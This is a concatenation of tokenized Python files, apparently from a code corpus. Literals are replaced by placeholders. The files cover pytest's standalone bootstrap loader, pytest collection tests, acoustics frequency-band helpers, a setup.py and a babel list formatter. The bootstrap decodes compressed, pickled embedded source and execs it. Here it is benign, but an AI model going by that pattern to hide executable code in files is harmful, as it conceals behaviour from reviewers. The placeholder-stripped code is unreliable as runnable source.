valuestr ) <EOL> return line <EOL> def _some_str ( value ) : <EOL> try : <EOL> return unicode ( value ) <EOL> except Exception : <EOL> try : <EOL> return str ( value ) <EOL> except Exception : <EOL> pass <EOL> return '<STR_LIT>' % type ( value ) . __name__ </s>
<s> sources = """<STR_LIT>""" <EOL> import sys <EOL> import base64 <EOL> import zlib <EOL> class DictImporter ( object ) : <EOL> def __init__ ( self , sources ) : <EOL> self . sources = sources <EOL> def find_module ( self , fullname , path = None ) : <EOL> if fullname == "<STR_LIT>" and sys . version_info >= ( <NUM_LIT:2> , <NUM_LIT:7> ) : <EOL> return None <EOL> if fullname in self . sources : <EOL> return self <EOL> if fullname + '<STR_LIT>' in self . sources : <EOL> return self <EOL> return None <EOL> def load_module ( self , fullname ) : <EOL> from types import ModuleType <EOL> try : <EOL> s = self . sources [ fullname ] <EOL> is_pkg = False <EOL> except KeyError : <EOL> s = self . sources [ fullname + '<STR_LIT>' ] <EOL> is_pkg = True <EOL> co = compile ( s , fullname , '<STR_LIT>' ) <EOL> module = sys . modules . setdefault ( fullname , ModuleType ( fullname ) ) <EOL> module . __file__ = "<STR_LIT>" % ( __file__ , fullname ) <EOL> module . __loader__ = self <EOL> if is_pkg : <EOL> module . __path__ = [ fullname ] <EOL> do_exec ( co , module . __dict__ ) <EOL> return sys . modules [ fullname ] <EOL> def get_source ( self , name ) : <EOL> res = self . sources . get ( name ) <EOL> if res is None : <EOL> res = self . sources . get ( name + '<STR_LIT>' ) <EOL> return res <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> try : <EOL> import pkg_resources <EOL> except ImportError : <EOL> sys . stderr . write ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:2> ) <EOL> if sys . version_info >= ( <NUM_LIT:3> , <NUM_LIT:0> ) : <EOL> exec ( "<STR_LIT>" ) <EOL> import pickle <EOL> sources = sources . encode ( "<STR_LIT:ascii>" ) <EOL> sources = pickle . loads ( zlib . decompress ( base64 . decodebytes ( sources ) ) ) <EOL> else : <EOL> import cPickle as pickle <EOL> exec ( "<STR_LIT>" ) <EOL> sources = pickle . loads ( zlib . decompress ( base64 . decodestring ( sources ) ) ) <EOL> importer = DictImporter ( sources ) <EOL> sys . meta_path . insert ( <NUM_LIT:0> , importer ) <EOL> entry = "<STR_LIT>" <EOL> do_exec ( entry , locals ( ) ) </s>
<s> def test_function ( ) : <EOL> pass <EOL> class TestClass : <EOL> def test_method ( self ) : <EOL> pass <EOL> def test_anothermethod ( self ) : <EOL> pass </s>
<s> import pytest , py <EOL> from _pytest . main import Session , EXIT_NOTESTSCOLLECTED <EOL> class TestCollector : <EOL> def test_collect_versus_item ( self ) : <EOL> from pytest import Collector , Item <EOL> assert not issubclass ( Collector , Item ) <EOL> assert not issubclass ( Item , Collector ) <EOL> def test_compat_attributes ( self , testdir , recwarn ) : <EOL> modcol = testdir . getmodulecol ( """<STR_LIT>""" ) <EOL> recwarn . clear ( ) <EOL> assert modcol . Module == pytest . Module <EOL> assert modcol . Class == pytest . Class <EOL> assert modcol . Item == pytest . Item <EOL> assert modcol . File == pytest . File <EOL> assert modcol . Function == pytest . Function <EOL> def test_check_equality ( self , testdir ) : <EOL> modcol = testdir . getmodulecol ( """<STR_LIT>""" ) <EOL> fn1 = testdir . collect_by_name ( modcol , "<STR_LIT>" ) <EOL> assert isinstance ( fn1 , pytest . Function ) <EOL> fn2 = testdir . collect_by_name ( modcol , "<STR_LIT>" ) <EOL> assert isinstance ( fn2 , pytest . Function ) <EOL> assert fn1 == fn2 <EOL> assert fn1 != modcol <EOL> if py . std . sys . version_info < ( <NUM_LIT:3> , <NUM_LIT:0> ) : <EOL> assert cmp ( fn1 , fn2 ) == <NUM_LIT:0> <EOL> assert hash ( fn1 ) == hash ( fn2 ) <EOL> fn3 = testdir . collect_by_name ( modcol , "<STR_LIT>" ) <EOL> assert isinstance ( fn3 , pytest . Function ) <EOL> assert not ( fn1 == fn3 ) <EOL> assert fn1 != fn3 <EOL> for fn in fn1 , fn2 , fn3 : <EOL> assert fn != <NUM_LIT:3> <EOL> assert fn != modcol <EOL> assert fn != [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] <EOL> assert [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] != fn <EOL> assert modcol != fn <EOL> def test_getparent ( self , testdir ) : <EOL> modcol = testdir . getmodulecol ( """<STR_LIT>""" ) <EOL> cls = testdir . collect_by_name ( modcol , "<STR_LIT>" ) <EOL> fn = testdir . collect_by_name ( <EOL> testdir . collect_by_name ( cls , "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> parent = fn . getparent ( pytest . Module ) <EOL> assert parent is modcol <EOL> parent = fn . getparent ( pytest . Function ) <EOL> assert parent is fn <EOL> parent = fn . getparent ( pytest . Class ) <EOL> assert parent is cls <EOL> def test_getcustomfile_roundtrip ( self , testdir ) : <EOL> hello = testdir . makefile ( "<STR_LIT>" , hello = "<STR_LIT>" ) <EOL> testdir . makepyfile ( conftest = """<STR_LIT>""" ) <EOL> node = testdir . getpathnode ( hello ) <EOL> assert isinstance ( node , pytest . File ) <EOL> assert node . name == "<STR_LIT>" <EOL> nodes = node . session . perform_collect ( [ node . nodeid ] , genitems = False ) <EOL> assert len ( nodes ) == <NUM_LIT:1> <EOL> assert isinstance ( nodes [ <NUM_LIT:0> ] , pytest . File ) <EOL> class TestCollectFS : <EOL> def test_ignored_certain_directories ( self , testdir ) : <EOL> tmpdir = testdir . tmpdir <EOL> tmpdir . ensure ( "<STR_LIT>" , '<STR_LIT>' ) <EOL> tmpdir . ensure ( "<STR_LIT>" , '<STR_LIT>' ) <EOL> tmpdir . ensure ( "<STR_LIT>" , '<STR_LIT>' ) <EOL> tmpdir . ensure ( "<STR_LIT>" , '<STR_LIT>' ) <EOL> tmpdir . ensure ( "<STR_LIT>" , '<STR_LIT>' ) <EOL> tmpdir . ensure ( "<STR_LIT>" , '<STR_LIT>' ) <EOL> for x in tmpdir . visit ( "<STR_LIT>" ) : <EOL> x . write ( "<STR_LIT>" ) <EOL> result = testdir . runpytest ( "<STR_LIT>" ) <EOL> s = result . stdout . str ( ) <EOL> assert "<STR_LIT>" not in s <EOL> assert "<STR_LIT>" in s <EOL> def test_custom_norecursedirs ( self , testdir ) : <EOL> testdir . makeini ( """<STR_LIT>""" ) <EOL> tmpdir = testdir . tmpdir <EOL> tmpdir . ensure ( "<STR_LIT>" , "<STR_LIT>" ) . write ( "<STR_LIT>" ) <EOL> tmpdir . ensure ( "<STR_LIT>" , "<STR_LIT>" ) . write ( "<STR_LIT>" ) <EOL> tmpdir . ensure ( "<STR_LIT>" , "<STR_LIT>" ) . write ( "<STR_LIT>" ) <EOL> rec = testdir . inline_run ( ) <EOL> rec . assertoutcome ( passed = <NUM_LIT:1> ) <EOL> rec = testdir . inline_run ( "<STR_LIT>" ) <EOL> rec . assertoutcome ( failed = <NUM_LIT:1> ) <EOL> def test_testpaths_ini ( self , testdir , monkeypatch ) : <EOL> testdir . makeini ( """<STR_LIT>""" ) <EOL> tmpdir = testdir . tmpdir <EOL> tmpdir . ensure ( "<STR_LIT>" , "<STR_LIT>" ) . write ( "<STR_LIT>" ) <EOL> tmpdir . ensure ( "<STR_LIT>" , "<STR_LIT>" ) . write ( "<STR_LIT>" ) <EOL> tmpdir . ensure ( "<STR_LIT>" , "<STR_LIT>" ) . write ( "<STR_LIT>" ) <EOL> items , reprec = testdir . inline_genitems ( '<STR_LIT>' ) <EOL> assert [ x . name for x in items ] == [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> for dirname in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> items , reprec = testdir . inline_genitems ( tmpdir . join ( dirname ) ) <EOL> assert [ x . name for x in items ] == [ '<STR_LIT>' % dirname ] <EOL> for dirname in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> monkeypatch . chdir ( testdir . tmpdir . join ( dirname ) ) <EOL> items , reprec = testdir . inline_genitems ( ) <EOL> assert [ x . name for x in items ] == [ '<STR_LIT>' % dirname ] <EOL> class TestCollectPluginHookRelay : <EOL> def test_pytest_collect_file ( self , testdir ) : <EOL> wascalled = [ ] <EOL> class Plugin : <EOL> def pytest_collect_file ( self , path , parent ) : <EOL> wascalled . append ( path ) <EOL> testdir . makefile ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> pytest . main ( [ testdir . tmpdir ] , plugins = [ Plugin ( ) ] ) <EOL> assert len ( wascalled ) == <NUM_LIT:1> <EOL> assert wascalled [ <NUM_LIT:0> ] . ext == '<STR_LIT>' <EOL> def test_pytest_collect_directory ( self , testdir ) : <EOL> wascalled = [ ] <EOL> class Plugin : <EOL> def pytest_collect_directory ( self , path , parent ) : <EOL> wascalled . append ( path . basename ) <EOL> testdir . mkdir ( "<STR_LIT:hello>" ) <EOL> testdir . mkdir ( "<STR_LIT>" ) <EOL> pytest . main ( testdir . tmpdir , plugins = [ Plugin ( ) ] ) <EOL> assert "<STR_LIT:hello>" in wascalled <EOL> assert "<STR_LIT>" in wascalled <EOL> class TestPrunetraceback : <EOL> def test_collection_error ( self , testdir ) : <EOL> p = testdir . makepyfile ( """<STR_LIT>""" ) <EOL> result = testdir . runpytest ( p ) <EOL> assert "<STR_LIT>" not in result . stdout . str ( ) , "<STR_LIT>" <EOL> result . stdout . fnmatch_lines ( [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] ) <EOL> def test_custom_repr_failure ( self , testdir ) : <EOL> p = testdir . makepyfile ( """<STR_LIT>""" ) <EOL> testdir . makeconftest ( """<STR_LIT>""" ) <EOL> result = testdir . runpytest ( p ) <EOL> result . stdout . fnmatch_lines ( [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] ) <EOL> @ pytest . mark . xfail ( reason = "<STR_LIT>" ) <EOL> def test_collect_report_postprocessing ( self , testdir ) : <EOL> p = testdir . makepyfile ( """<STR_LIT>""" ) <EOL> testdir . makeconftest ( """<STR_LIT>""" ) <EOL> result = testdir . runpytest ( p ) <EOL> result . stdout . fnmatch_lines ( [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] ) <EOL> class TestCustomConftests : <EOL> def test_ignore_collect_path ( self , testdir ) : <EOL> testdir . makeconftest ( """<STR_LIT>""" ) <EOL> sub = testdir . mkdir ( "<STR_LIT>" ) <EOL> sub . ensure ( "<STR_LIT>" ) . write ( "<STR_LIT>" ) <EOL> sub . join ( "<STR_LIT>" ) . write ( "<STR_LIT>" ) <EOL> testdir . makepyfile ( "<STR_LIT>" ) <EOL> testdir . makepyfile ( test_one = "<STR_LIT>" ) <EOL> result = testdir . runpytest ( "<STR_LIT>" ) <EOL> assert result . ret == <NUM_LIT:0> <EOL> result . stdout . fnmatch_lines ( [ "<STR_LIT>" ] ) <EOL> def test_ignore_collect_not_called_on_argument ( self , testdir ) : <EOL> testdir . makeconftest ( """<STR_LIT>""" ) <EOL> p = testdir . makepyfile ( "<STR_LIT>" ) <EOL> result = testdir . runpytest ( p ) <EOL> assert result . ret == <NUM_LIT:0> <EOL> result . stdout . fnmatch_lines ( "<STR_LIT>" ) <EOL> result = testdir . runpytest ( ) <EOL> assert result . ret == EXIT_NOTESTSCOLLECTED <EOL> result . stdout . fnmatch_lines ( "<STR_LIT>" ) <EOL> def test_collectignore_exclude_on_option ( self , testdir ) : <EOL> testdir . makeconftest ( """<STR_LIT>""" ) <EOL> testdir . mkdir ( "<STR_LIT:hello>" ) <EOL> testdir . makepyfile ( test_world = "<STR_LIT>" ) <EOL> result = testdir . runpytest ( ) <EOL> assert result . ret == EXIT_NOTESTSCOLLECTED <EOL> assert "<STR_LIT>" not in result . stdout . str ( ) <EOL> result = testdir . runpytest ( "<STR_LIT>" ) <EOL> assert result . ret == <NUM_LIT:0> <EOL> assert "<STR_LIT>" in result . stdout . str ( ) <EOL> def test_pytest_fs_collect_hooks_are_seen ( self , testdir ) : <EOL> testdir . makeconftest ( """<STR_LIT>""" ) <EOL> testdir . mkdir ( "<STR_LIT>" ) <EOL> testdir . makepyfile ( "<STR_LIT>" ) <EOL> result = testdir . runpytest ( "<STR_LIT>" ) <EOL> result . stdout . fnmatch_lines ( [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] ) <EOL> def test_pytest_collect_file_from_sister_dir ( self , testdir ) : <EOL> sub1 = testdir . mkpydir ( "<STR_LIT>" ) <EOL> sub2 = testdir . mkpydir ( "<STR_LIT>" ) <EOL> conf1 = testdir . makeconftest ( """<STR_LIT>""" ) <EOL> conf1 . move ( sub1 . join ( conf1 . basename ) ) <EOL> conf2 = testdir . makeconftest ( """<STR_LIT>""" ) <EOL> conf2 . move ( sub2 . join ( conf2 . basename ) ) <EOL> p = testdir . makepyfile ( "<STR_LIT>" ) <EOL> p . copy ( sub1 . join ( p . basename ) ) <EOL> p . copy ( sub2 . join ( p . basename ) ) <EOL> result = testdir . runpytest ( "<STR_LIT>" ) <EOL> result . stdout . fnmatch_lines ( [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] ) <EOL> class TestSession : <EOL> def test_parsearg ( self , testdir ) : <EOL> p = testdir . makepyfile ( "<STR_LIT>" ) <EOL> subdir = testdir . mkdir ( "<STR_LIT>" ) <EOL> subdir . ensure ( "<STR_LIT>" ) <EOL> target = subdir . join ( p . basename ) <EOL> p . move ( target ) <EOL> subdir . chdir ( ) <EOL> config = testdir . parseconfig ( p . basename ) <EOL> rcol = Session ( config = config ) <EOL> assert rcol . fspath == subdir <EOL> parts = rcol . _parsearg ( p . basename ) <EOL> assert parts [ <NUM_LIT:0> ] == target <EOL> assert len ( parts ) == <NUM_LIT:1> <EOL> parts = rcol . _parsearg ( p . basename + "<STR_LIT>" ) <EOL> assert parts [ <NUM_LIT:0> ] == target <EOL> assert parts [ <NUM_LIT:1> ] == "<STR_LIT>" <EOL> assert len ( parts ) == <NUM_LIT:2> <EOL> def test_collect_topdir ( self , testdir ) : <EOL> p = testdir . makepyfile ( "<STR_LIT>" ) <EOL> id = "<STR_LIT>" . join ( [ p . basename , "<STR_LIT>" ] ) <EOL> config = testdir . parseconfig ( id ) <EOL> topdir = testdir . tmpdir <EOL> rcol = Session ( config ) <EOL> assert topdir == rcol . fspath <EOL> colitems = rcol . perform_collect ( [ rcol . nodeid ] , genitems = False ) <EOL> assert len ( colitems ) == <NUM_LIT:1> <EOL> assert colitems [ <NUM_LIT:0> ] . fspath == p <EOL> def test_collect_protocol_single_function ( self , testdir ) : <EOL> p = testdir . makepyfile ( "<STR_LIT>" ) <EOL> id = "<STR_LIT>" . join ( [ p . basename , "<STR_LIT>" ] ) <EOL> items , hookrec = testdir . inline_genitems ( id ) <EOL> item , = items <EOL> assert item . name == "<STR_LIT>" <EOL> newid = item . nodeid <EOL> assert newid == id <EOL> py . std . pprint . pprint ( hookrec . calls ) <EOL> topdir = testdir . tmpdir <EOL> hookrec . assert_contains ( [ <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> ] ) <EOL> def test_collect_protocol_method ( self , testdir ) : <EOL> p = testdir . makepyfile ( """<STR_LIT>""" ) <EOL> normid = p . basename + "<STR_LIT>" <EOL> for id in [ p . basename , <EOL> p . basename + "<STR_LIT>" , <EOL> p . basename + "<STR_LIT>" , <EOL> normid , <EOL> ] : <EOL> items , hookrec = testdir . inline_genitems ( id ) <EOL> assert len ( items ) == <NUM_LIT:1> <EOL> assert items [ <NUM_LIT:0> ] . name == "<STR_LIT>" <EOL> newid = items [ <NUM_LIT:0> ] . nodeid <EOL> assert newid == normid <EOL> def test_collect_custom_nodes_multi_id ( self , testdir ) : <EOL> p = testdir . makepyfile ( "<STR_LIT>" ) <EOL> testdir . makeconftest ( """<STR_LIT>""" % p . basename ) <EOL> id = p . basename <EOL> items , hookrec = testdir . inline_genitems ( id ) <EOL> py . std . pprint . pprint ( hookrec . calls ) <EOL> assert len ( items ) == <NUM_LIT:2> <EOL> hookrec . assert_contains ( [ <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ] ) <EOL> def test_collect_subdir_event_ordering ( self , testdir ) : <EOL> p = testdir . makepyfile ( "<STR_LIT>" ) <EOL> aaa = testdir . mkpydir ( "<STR_LIT>" ) <EOL> test_aaa = aaa . join ( "<STR_LIT>" ) <EOL> p . move ( test_aaa ) <EOL> items , hookrec = testdir . inline_genitems ( ) <EOL> assert len ( items ) == <NUM_LIT:1> <EOL> py . std . pprint . pprint ( hookrec . calls ) <EOL> hookrec . assert_contains ( [ <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> ] ) <EOL> def test_collect_two_commandline_args ( self , testdir ) : <EOL> p = testdir . makepyfile ( "<STR_LIT>" ) <EOL> aaa = testdir . mkpydir ( "<STR_LIT>" ) <EOL> bbb = testdir . mkpydir ( "<STR_LIT>" ) <EOL> test_aaa = aaa . join ( "<STR_LIT>" ) <EOL> p . copy ( test_aaa ) <EOL> test_bbb = bbb . join ( "<STR_LIT>" ) <EOL> p . move ( test_bbb ) <EOL> id = "<STR_LIT:.>" <EOL> items , hookrec = testdir . inline_genitems ( id ) <EOL> assert len ( items ) == <NUM_LIT:2> <EOL> py . std . pprint . pprint ( hookrec . calls ) <EOL> hookrec . assert_contains ( [ <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ] ) <EOL> def test_serialization_byid ( self , testdir ) : <EOL> testdir . makepyfile ( "<STR_LIT>" ) <EOL> items , hookrec = testdir . inline_genitems ( ) <EOL> assert len ( items ) == <NUM_LIT:1> <EOL> item , = items <EOL> items2 , hookrec = testdir . inline_genitems ( item . nodeid ) <EOL> item2 , = items2 <EOL> assert item2 . name == item . name <EOL> assert item2 . fspath == item . fspath <EOL> def test_find_byid_without_instance_parents ( self , testdir ) : <EOL> p = testdir . makepyfile ( """<STR_LIT>""" ) <EOL> arg = p . basename + ( "<STR_LIT>" ) <EOL> items , hookrec = testdir . inline_genitems ( arg ) <EOL> assert len ( items ) == <NUM_LIT:1> <EOL> item , = items <EOL> assert item . nodeid . endswith ( "<STR_LIT>" ) <EOL> class Test_getinitialnodes : <EOL> def test_global_file ( self , testdir , tmpdir ) : <EOL> x = tmpdir . ensure ( "<STR_LIT>" ) <EOL> config = testdir . parseconfigure ( x ) <EOL> col = testdir . getnode ( config , x ) <EOL> assert isinstance ( col , pytest . Module ) <EOL> assert col . name == '<STR_LIT>' <EOL> assert col . parent . name == testdir . tmpdir . basename <EOL> assert col . parent . parent is None <EOL> for col in col . listchain ( ) : <EOL> assert col . config is config <EOL> def test_pkgfile ( self , testdir ) : <EOL> tmpdir = testdir . tmpdir <EOL> subdir = tmpdir . join ( "<STR_LIT>" ) <EOL> x = subdir . ensure ( "<STR_LIT>" ) <EOL> subdir . ensure ( "<STR_LIT>" ) <EOL> config = testdir . parseconfigure ( x ) <EOL> col = testdir . getnode ( config , x ) <EOL> assert isinstance ( col , pytest . Module ) <EOL> assert col . name == '<STR_LIT>' <EOL> assert col . parent . parent is None <EOL> for col in col . listchain ( ) : <EOL> assert col . config is config <EOL> class Test_genitems : <EOL> def test_check_collect_hashes ( self , testdir ) : <EOL> p = testdir . makepyfile ( """<STR_LIT>""" ) <EOL> p . copy ( p . dirpath ( p . purebasename + "<STR_LIT:2>" + "<STR_LIT>" ) ) <EOL> items , reprec = testdir . inline_genitems ( p . dirpath ( ) ) <EOL> assert len ( items ) == <NUM_LIT:4> <EOL> for numi , i in enumerate ( items ) : <EOL> for numj , j in enumerate ( items ) : <EOL> if numj != numi : <EOL> assert hash ( i ) != hash ( j ) <EOL> assert i != j <EOL> def test_example_items1 ( self , testdir ) : <EOL> p = testdir . makepyfile ( '''<STR_LIT>''' ) <EOL> items , reprec = testdir . inline_genitems ( p ) <EOL> assert len ( items ) == <NUM_LIT:3> <EOL> assert items [ <NUM_LIT:0> ] . name == '<STR_LIT>' <EOL> assert items [ <NUM_LIT:1> ] . name == '<STR_LIT>' <EOL> assert items [ <NUM_LIT:2> ] . name == '<STR_LIT>' <EOL> assert items [ <NUM_LIT:0> ] . getmodpath ( ) == "<STR_LIT>" <EOL> assert items [ <NUM_LIT:1> ] . getmodpath ( ) == "<STR_LIT>" <EOL> assert items [ <NUM_LIT:2> ] . getmodpath ( ) == "<STR_LIT>" <EOL> s = items [ <NUM_LIT:0> ] . getmodpath ( stopatmodule = False ) <EOL> assert s . endswith ( "<STR_LIT>" ) <EOL> print ( s ) <EOL> def test_class_and_functions_discovery_using_glob ( self , testdir ) : <EOL> """<STR_LIT>""" <EOL> testdir . makeini ( """<STR_LIT>""" ) <EOL> p = testdir . makepyfile ( '''<STR_LIT>''' ) <EOL> items , reprec = testdir . inline_genitems ( p ) <EOL> ids = [ x . getmodpath ( ) for x in items ] <EOL> assert ids == [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> def test_matchnodes_two_collections_same_file ( testdir ) : <EOL> testdir . makeconftest ( """<STR_LIT>""" ) <EOL> p = testdir . makefile ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> result = testdir . runpytest ( ) <EOL> assert result . ret == <NUM_LIT:0> <EOL> result . stdout . fnmatch_lines ( [ <EOL> "<STR_LIT>" , <EOL> ] ) <EOL> res = testdir . runpytest ( "<STR_LIT>" % p . basename ) <EOL> res . stdout . fnmatch_lines ( [ <EOL> "<STR_LIT>" , <EOL> ] ) <EOL> class TestNodekeywords : <EOL> def test_no_under ( self , testdir ) : <EOL> modcol = testdir . getmodulecol ( """<STR_LIT>""" ) <EOL> l = list ( modcol . keywords ) <EOL> assert modcol . name in l <EOL> for x in l : <EOL> assert not x . startswith ( "<STR_LIT:_>" ) <EOL> assert modcol . name in repr ( modcol . keywords ) <EOL> def test_issue345 ( self , testdir ) : <EOL> testdir . makepyfile ( """<STR_LIT>""" ) <EOL> reprec = testdir . inline_run ( "<STR_LIT>" ) <EOL> reprec . assertoutcome ( passed = <NUM_LIT:1> , failed = <NUM_LIT:0> ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division <EOL> import numpy as np <EOL> import acoustics <EOL> from acoustics . standards . iec_61672_1_2013 import NOMINAL_OCTAVE_CENTER_FREQUENCIES as OCTAVE_CENTER_FREQUENCIES <EOL> from acoustics . standards . iec_61672_1_2013 import NOMINAL_THIRD_OCTAVE_CENTER_FREQUENCIES as THIRD_OCTAVE_CENTER_FREQUENCIES <EOL> def octave ( first , last ) : <EOL> """<STR_LIT>""" <EOL> return acoustics . signal . OctaveBand ( fstart = first , fstop = last , fraction = <NUM_LIT:1> ) . nominal <EOL> def octave_low ( first , last ) : <EOL> return octave ( first , last ) / np . sqrt ( <NUM_LIT> ) <EOL> def octave_high ( first , last ) : <EOL> return octave ( first , last ) * np . sqrt ( <NUM_LIT> ) <EOL> def third ( first , last ) : <EOL> """<STR_LIT>""" <EOL> return acoustics . signal . OctaveBand ( fstart = first , fstop = last , fraction = <NUM_LIT:3> ) . nominal <EOL> def third_low ( first , last ) : <EOL> return third ( first , last ) / <NUM_LIT> ** ( <NUM_LIT:1.0> / <NUM_LIT> ) <EOL> def third_high ( first , last ) : <EOL> return third ( first , last ) * <NUM_LIT> ** ( <NUM_LIT:1.0> / <NUM_LIT> ) <EOL> def third2oct ( levels , axis = None ) : <EOL> """<STR_LIT>""" <EOL> levels = np . array ( levels ) <EOL> axis = axis if axis is not None else levels . ndim - <NUM_LIT:1> <EOL> try : <EOL> assert ( levels . shape [ axis ] % <NUM_LIT:3> == <NUM_LIT:0> ) <EOL> except AssertionError : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> shape = list ( levels . shape ) <EOL> shape [ axis ] = shape [ axis ] // <NUM_LIT:3> <EOL> shape . insert ( axis + <NUM_LIT:1> , <NUM_LIT:3> ) <EOL> levels = np . reshape ( levels , shape ) <EOL> return np . squeeze ( acoustics . decibel . dbsum ( levels , axis = axis + <NUM_LIT:1> ) ) <EOL> def _check_band_type ( freqs ) : <EOL> """<STR_LIT>""" <EOL> octave_bands = octave ( <NUM_LIT:16> , <NUM_LIT> ) <EOL> third_oct_bands = third ( <NUM_LIT> , <NUM_LIT> ) <EOL> def _check_sort ( freqs , bands ) : <EOL> index = np . where ( np . in1d ( bands , freqs ) ) [ <NUM_LIT:0> ] <EOL> band_pos = index - index [ <NUM_LIT:0> ] <EOL> if ( band_pos == np . arange ( band_pos . size ) ) . all ( ) : <EOL> sorted = True <EOL> else : <EOL> sorted = False <EOL> return sorted <EOL> if np . in1d ( freqs , octave_bands ) . all ( ) == True : <EOL> is_sorted = _check_sort ( freqs , octave_bands ) <EOL> if is_sorted is True : <EOL> band_type = '<STR_LIT>' <EOL> else : <EOL> band_type = '<STR_LIT>' <EOL> elif np . in1d ( freqs , third_oct_bands ) . all ( ) == True : <EOL> is_sorted = _check_sort ( freqs , third_oct_bands ) <EOL> if is_sorted is True : <EOL> band_type = '<STR_LIT>' <EOL> else : <EOL> band_type = '<STR_LIT>' <EOL> else : <EOL> band_type = None <EOL> return band_type </s>
<s> import os <EOL> from setuptools import setup , find_packages <EOL> from setuptools . command . test import test as TestCommand <EOL> import sys <EOL> import numpy as np <EOL> from Cython . Build import cythonize <EOL> if os . path . exists ( '<STR_LIT>' ) : <EOL> long_description = open ( '<STR_LIT>' ) . read ( ) <EOL> else : <EOL> long_description = "<STR_LIT>" <EOL> class PyTest ( TestCommand ) : <EOL> def finalize_options ( self ) : <EOL> TestCommand . finalize_options ( self ) <EOL> self . test_args = [ ] <EOL> self . test_suite = True <EOL> def run_tests ( self ) : <EOL> import pytest <EOL> errno = pytest . main ( self . test_args ) <EOL> sys . exit ( errno ) <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> description = "<STR_LIT>" , <EOL> long_description = long_description , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> packages = find_packages ( exclude = [ "<STR_LIT>" ] ) , <EOL> package_dir = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> package_data = { '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> scripts = [ ] , <EOL> zip_safe = False , <EOL> install_requires = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> extras_require = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> tests_require = [ '<STR_LIT>' ] , <EOL> cmdclass = { '<STR_LIT:test>' : PyTest } , <EOL> ext_modules = cythonize ( '<STR_LIT>' ) , <EOL> include_dirs = [ np . get_include ( ) ] <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> from babel . core import Locale , default_locale <EOL> DEFAULT_LOCALE = default_locale ( ) <EOL> def format_list ( lst , locale = DEFAULT_LOCALE ) : <EOL> """<STR_LIT>""" <EOL> locale = Locale . parse ( locale ) <EOL> if not lst : <EOL> return '<STR_LIT>' <EOL> if len ( lst ) == <NUM_LIT:1> : <EOL> return lst [ <NUM_LIT:0> ] <EOL> if len ( lst ) == <NUM_LIT:2> : <EOL> return locale . list_patterns [ '<STR_LIT:2>' ] . format ( * lst ) <EOL> result = locale . list_patterns [ '<STR_LIT:start>' ] . format ( lst [ <NUM_LIT:0> ] , lst [ <NUM_LIT:1> ] ) <EOL> for elem in lst [ <NUM_LIT:2> : - <NUM_LIT:1> ] : <EOL> result = locale . list_patterns [ '<STR_LIT>' ] . format ( result , elem ) <EOL> result = locale . list_patterns [ '<STR_LIT:end>' ] . format ( result , lst [ - <NUM_LIT:1> ] ) <EOL> return result </s>
